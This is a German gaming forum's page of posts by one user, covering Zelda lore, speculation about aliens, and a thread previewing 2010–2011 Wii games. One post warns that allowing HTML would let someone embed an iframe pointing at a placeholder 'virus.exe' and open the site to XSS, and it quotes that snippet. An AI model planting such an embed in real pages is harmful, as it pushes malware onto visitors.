Beiträge von Kikatzu

Ich finde es großartig, dass du es betonst!
    Würde mich freuen wenn du Ocarina of Time & Twilight Princess LPst ;).

Was mich eigentlich immer stört, dass jeder sich ROMs zieht, was auch illegal ist. Rechtlich gesehen illegal, aber keiner interessiert es obs gezogen oder nicht.

Zitat

Original von PeterGriffin
    Nö hab ich nicht. Hab ich in einem Buch gelesen welches sich mit solchen Themen beschäftigt.Ich kucke kein Indianer Jones würde ich auch nie :rofl:.Unmöglich so ein geniales Buch mit einem solchen Film zu vergleichen. :pouting_face:

Habe mich geirrt war in Mexiko. So und vergleiche das mal mit einem Käfer:
    Alien in Mexiko

Und nur komisch das ich nicht aus den USA komme sondern aus Deutschland und manche Sendungen über die Entstehung des Universums kucke wo über so etwas erzählt wird X(

Lernst du auch mal richtig durchlesen. Ich habe so ein unwissenschaftliches Buch niemals mit Indy Jones verglichen. Wenn schon so einen Müll darin steht. Bevor man Bücher liest, sollte man sich überlegen ob dies auch wissenschaftlich bestätigt worden ist.
    Außerdem sagte ich nicht das du ein Amerikaner bist, sondern, dass solch mysteriöse Ereignissen in den Vereinigten Staaten zu finden sind.

Edit:

Das Teil in deinem Video sieht aus wie ein Wesen aus Herr der Ringe :P.

Meine Definition von Grafik....

Schlechte Grafik
    Total unecht wirkende, in den Augen brennende Grafik. Die Grafik soll nicht zu bunt, dunkel u / o hell sein. Alles soll für das Auge gerecht sein nicht
    Zuviele Ecken die man gut erkennt sind ein "noGo".

Gute Grafik
    Real wirkende Grafik. Wenig/ keine Ecken (bei Dinge die eig. rund sind).
    Angenehmes Bild, dass man stundenlang ansehen kann.

Na ja, Termina und Hyrule sind sich ähnlich ... ich meine, wäre doch cool wenn man eine ähnlicher Link spielen könnte. Aber die Maske wurde ja nur eingesetzt, da es keinen großen-Link in MM gab ;).

Oder so eine Feen Transformation von Link xD.

Ich hab nicht erwähnt das wir die einzigsten sind. Komischerweise sind solche unwahrscheinliche Stories immer in den USA zu finden ;).

Ich hab mal ein Käfer gesehen der hatte das Gesichts eine Frosches und den Körper von Link, die Spezies fand ein Farmer in der USA ... :xugly:

Ach ja, das mit den Gott-ähnlichen Lebewesen hast du aus Indiana Jones geklaut xD

Was haltet ihr davon?
    Ob es Oni-Link in Skyward Sword geben wird. Ist unvorstellbar, wäre aber doch cool, wenn Link am Ende mit der Grimmigen-Gottheit gegen irgendein Schurke kämpfen würde.

Was meint ihr?

Na ja, aber in vielen Sektoren des Universums ist die kosmische Strahlung enorm hoch, nicht mal eine Sonne könnte diese Abwähren und die Lebensgrundlage muss optimal sein.

Ich finde das mit anderen Wesen, zwar vorstellbar, aber ob das stimmt oder nicht, kann niemand wissen. Genauso wie jemand denkt, dass hinter dem Schwarzen löcher eine Dimension steckt. Biste drinn, biste nicht mehr existent.

Ich glaube selbst nicht an Gott, ich denke nur daran, das es was ähnliches gibt ^^.

Ich finde es nur komisch, dass wir von Aliens erschufen worden sind.
    So eine intelligente Spezies musste sich millionenjahre entwickeln und davor müsste ihr Planet und ihr System entwickelt sein, dass dauert ziemlich lange. Und das Universum selbst existiert nach Wissenschaftlichentheorien nicht sehr Lange.
    Denken wir daran, dass sich vor dem Urknall schon Teilchen gebildet haben, denken wir daran, dass die Teilchen aus Gasen entstanden ... Gase die sich polymer entwickelt haben :D. Vielleicht stammen wir alle von Gase ab :D.

Ich würde sagen, jeder soll an das denken, was er will^^.

Wo bleibt Gott :xugly:?!?!

Wenn ihr Bücher liest, dann wisst ihr das eure Theorien meist falsch sind. Das mit dem Meteor ist zwar vorstellbar, aber bis einer der fast 200.000 Lichtjahre entfernt ist auf die Erde rast, wäre er nicht mal heute da. Wenn der Meteor in Lichtgeschwindigkeit reisen würde, würde er eher verglühen als das er unseren Planeten erreicht. Denkt mal an Wurmlöcher ;).

Dekus haben wir gesehen, bzw. Laubkerle in der Demo. Und ich denke, dass nur der Anfang von Skyward Sword im Himmel stattfindet.

Würde man HTML aktivieren könnte man z.B eine iframe einbinden.

Beispiel:

Code
    <iframe src="meinvirus.xy/virus.exe"></iframe>

Und ich glaube, dass dann auch JS aktiviert wird (da wahrscheinlich alles mit HTMLSPECIALCHARS gefiltert wird), dann kann jemand die Seite durch XSS exploiten -.-

Der Thread handelt darüber, welche Wii-Spiele im kommenden Jahr erscheinen wird.
    Wenn ihr den Thread kopieren wollt, bitte ich euch immer eine Quelle anzugeben.

[hr]

The Legend of Zelda : Skyward Sword

Das neue Zelda-Abenteuer das auf der Nintendo-Wii im kommenden Jahr erscheinen wird.
    Das Spiel ist im Inhalt ganzschön verbessert worden.
    Miyamato gab an, dass sie sich mehr auf den Spaßfaktor konzentrieren als auf die Geschichte.
    (Skyward Sword reiht sich in einer Timeline vor Ocarina of Time ein. Ocarina of Time wird auf der 3DS remaked.)

Genre: Action-Adventure
    Release: 2011
    USK: o.A

E3-Trailer: http://www.youtube.com/watch?v=6DI054qm_xQ
    [hr]
    Metroid - Other M
    [Youtube]

Externer Inhalt www.youtube.com
    Inhalte von externen Seiten werden ohne deine Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklärst du dich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.
    [/youtube]
    Im neuen Metroid-Game handelt es sich um eine Fortsetzung.
    Nachdem Samus vom Baby Metroid von Mother Brain gerettet wurde, starb das Baby und Samus setzte seinen Weg fort...
    Aber sie erhält einen Hilfe-Ruf mit dem Stichwort "Baby's Cry"...
    Was sich damit aufsich hat... findet ihr im Trailer (english)

Genre: Action Adventure
    Release: 31.8.2010
    USK: Warscheinlich 16
    [hr]

Kirby's Epic Yarn

[youtube]

Inhalte von externen Seiten werden ohne deine Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklärst du dich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.
    [/youtube]
    Kriby ist wieder zurück und das in zweidimensionaler Form!
    Es ist ein Mix aus Paper-Grafik und der Yoshi-Story-Grafik.
    Leider kann ich nicht viel darüber sagen, aber es macht einen guten Eindruck.

Genre: 2-D Plattformer
    Release: 2010
    [hr]
    Donkey Kong Country - Returns
    [youtube]

[/youtube]
    Der Gorilla mit der Krawatte ist zurück und das auf der Wii.
    Das damalige N64-Spiel, kommt mit einem Comeback.
    Ein Jump & Run-Adventure - Es mischt altbekannte Features mit neuen :thumb:.

Genre: 2-D Plattformer
    [hr]

Wii-Party

[youtube]

[/youtube]
    Ein neues Party-Spiel für die Wii ist im anmarch!
    Es nennt sich Wii-Party und ist wie im Trailer zusehen ist, ein tolles Party-Game. Die verschiedende Disziplinen erinnern auch an Mario Party.

Genre: Party
    [hr]
    Fling Smash
    [youtube]

[/youtube]
    Fling Smash ist ein Art Pinball-Spiel. Die Story handelt über eine Invasion auf der Suthon-Insel.
    Mehr im Trailer...

Genre: Action-Sidescroller
    [hr]
    Mario Sports Mix
    [youtube]

[/youtube]
    Nun ist der Klemptner samt seinen Irrwitzigen Freunde und Feinde zurück und das in einem Multi Sport Mix.
    Der Titel erklärt es schon: Walleyball, Strandhockey, Basketball und mehr.
    Ein weiterer Hochgenuss!

Genre: Sport
    Release: 2011
    [hr]
    PokéPark Wii - Pikachu's Adventure
    [youtube]

[/youtube]
    Im ersten Wii-Pokemon Spiel handelt es sich um verloren gegangene "Sky Prisma's"-Stücke, diese das legendäre-Pokemon Mew verloren hat. Es herrscht aufrur und nur Pikachu kann den Tag retten.
    Hört sich spannend an.

Genre: Action-Adventure
    [hr]
    Samurai Warriors 3
    [youtube]

[/youtube]
    Samurai Warrirors 3 - Ein Samurai Spiel, indem der Spieler als Samurai kämpft und verschiedene kämpfe gewinnt.
    Weiteres weiß ich nicht mehr über diesen Titel :(.

Genre: Action
    Release: 27.9.2010
    USK: 12
    [hr]
    ...Weitere Titel werden hinzugefügt...

Regeln dieses Threads:
    - Standart Regeln
    - Das Kopieren ist nur erlaubt, wenn eine Quelle dabei steht!
    - Es darf über die Titeln eine Diskussion geführt werden, aber bitte kein Streit und gespamme!

Danke-Button pushen!

Quelle : http://www.pspking.de/forum/showthread.php?tid=22547

In Wind Waker bin ich mal in die Lava gesprungen und habe irgendwas gedrückt, dannach war ich unter der Lava und konnte in der Lava bzw. unter der Lava schwimmen, aber als ich wieder nach oben kam, starb ich ^^.

Der Mond hatte nicht das Gesicht von Majora.
    Der Mond war warscheinlich ein normaler Mond.

Z.B. weint der Mond, dh. er möchte nicht auf die Welt stürzen.
    Aber nachdem Link die vier Giganten herbeiraf, sagte der Mond etwas:

Ich bin um verzehren.... Verzehren alles! D.h soviel wie : Ich möchte alles verzehren (essen,zerstören,vernichten,konsumieren).

Danach riss der Mond sein Mund weiter auf, er wollte die vier Giganten mit verschlingen.
    Daraufhin atmete der Mond ein und atmete Link und Majora mit.

Im Mond ist nur ein Baum, es ist eine friedliche Landschaft. Gebirge aushenrum, vier Kinder in Gestalt des Maskenhändlers spielen fangen, eines sieht Traurig aus und spielt nicht mit den anderen.
    Komischerweiße haben die alle die Vermächtnisse der Wächter an.
    Majoras Maske muss auch ein Vermächtnis sein, vielleicht von dem Ungeheuer aus dem Manga.

Aber eins ist klar, sie sind nicht im Innern des Mondes.

Der Ton hört sich so an, als ob Link gerade ein Eismonster mit Feuerpfeilen beschießt.

Das einzige ist, der Mond löst sich auf, nur das ist zu sehen.
    Ich glaube aber eher der Mond löst sich auf, vielleicht ist er nur von Majoras Maske erschienen worden.
    Man weiß es einfach nicht. Vielleicht hatte Termina auch keinen Mond, alles ist in Fantasy Spielen möglich.

In Wind-Waker meint Ganondorf, das Link die Dämonen befreit hat, als er das Master-Schwert aus den Stein zog.

Kann ja sein, aber Ganon wurde in OOT ja nur durch die Kraft der sieben Weisen gebannt nicht nur durch das Master-Schwert ansich, die Weisen verleiten ihm diese Kraft für den Gandestoß um ihn in die Hölle zu verbannen.